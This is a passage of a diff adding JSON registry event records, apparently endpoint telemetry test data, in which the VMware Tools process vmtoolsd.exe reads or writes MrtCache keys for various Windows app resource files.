"{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570928250000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570929650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570929650000, + "unique_pid": 
"{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570930440000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570930440000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program 
Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570930740000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570930740000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570931990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + 
"process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570931990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570932460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570932460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570933550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570933550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934020000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570934020000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934490000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware 
Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570934490000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8\\LanguageList", + "registry_value": 
"LanguageList", + "timestamp": 131883570934960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570935430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570935430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570936360000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570936360000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", + "registry_value": 
"C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570936990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570936990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570937460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570937460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570938080000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570938080000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + 
"process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570938550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570938710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570939180000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570939180000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570939650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 